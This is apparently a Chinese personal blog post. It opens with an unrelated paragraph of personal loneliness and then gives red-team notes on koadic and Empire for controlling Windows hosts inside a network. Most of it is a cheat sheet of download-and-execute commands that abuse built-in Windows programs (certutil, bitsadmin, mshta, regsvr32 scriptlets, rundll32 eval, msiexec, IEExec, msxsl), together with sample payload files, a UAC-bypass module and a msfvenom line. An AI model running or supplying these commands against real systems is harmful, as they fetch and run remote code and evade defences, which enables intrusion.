活了二十几年,从来没有人给过我一次意外感动或惊喜,也没有人在我生日的时候给过我特别的礼物,生病的时候得到的只是一些不在身边的语言安慰,也不见谁真正的照顾过自己,甚至有的时候自己蒙头睡一觉就好了,也有人喜欢过我,但是从没见谁坚持过。
defcon介绍的工具koadic 能满足内网控制windows基本所有难题,内网中难处理的js/vbs/regsvr问题,下载与执行。 powershell 执行是会长度限制。powershell的使用可以介入使用msf web_delivery中转。同时也推荐使用empire。empire基于powershell的玩法是不错的。
这里推荐使用koadic 。
koadic 使用模板
stager/js/mshta
mshta https://
zombies
use implant/ 里面选择模板进行bypass
use implant/elevate/bypassuac_eventvwr
set PAYLOAD 0
info
set PAYLOAD 0 设备存活的zombies
端口扫描 implant/scan/tcp
koadic 使用模板
stager/js/regsvr
执行 regsvr32 /s /u /n /i:https://xxxxxxx scrobj.dll
-----
--------------
windows下命令行下载文件总结
0x00 Powershell
win2003、winXP不支持
$client = new-object System.Net.WebClient
$client.DownloadFile(‘https://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)
0x01 ftp
ftp 192.168.3.2
输入用户名和密码后
lcd E:\file # 进入E盘下的file目录
cd www # 进入服务器上的www目录
get access.log # 将服务器上的access.log下载到E:\file
可以参考:https://baike.baidu.com/item/ftp/13839
0x02 IPC$
copy \192.168.3.1\c$\test.exe E:\file
可以参考:https://www.163164.com/jiqiao/163164com011.htm
0x03 Certutil
可以参考:https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx
应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
certutil.exe -urlcache -split -f https://192.168.3.1/test.txt file.txt
0x04 bitsadmin
可以参考:https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx
1、bitsadmin /rawreturn /transfer getfile https://192.168.3.1/test.txt E:\file\test.txt
2、bitsadmin /rawreturn /transfer getpayload https://192.168.3.1/test.txt E:\file\test.txt
0x05 msiexec
msiexec /q /i https://192.168.3.1/test.txt
0x06 IEExec
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec https://192.168.3.1/test.exe
0x07 python
C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘https://192.168.3.1/test.zip’).read();”
0x08 mshta
mshta https://192.168.3.1/run.hta
run.hta 内容如下:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
0x09 rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
其实还是依赖于WScript.shell这个组件
0x10 regsvr32
regsvr32 /u /s /i:https://192.168.3.1/test.data scrobj.dll
test.data内容:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet - requires a webserver to stage the payload)
------------------------------------
其他
5、pubprn.vbs
eg:
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
8、certutil
eg:
certutil -urlcache -split -f https://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f https://192.168.254.102:80/a delete
9、msiexec
msiexec /q /i https://site.com/payloads/calc.png
calc.png
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
10、msxsl.exe(需下载)
eg:
msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
demo.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
exec.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="https://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="https://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
11、IEExec
eg:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec https://site.com/files/test64.exe
细节:戳我
12、IEXPLORE.EXE
这个需要IE存在可执行命令的漏洞
eg:
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" https://site.com/exp
exp可以使用类似ms14_064
© Sh4dow's Blog | Powered by LOFTER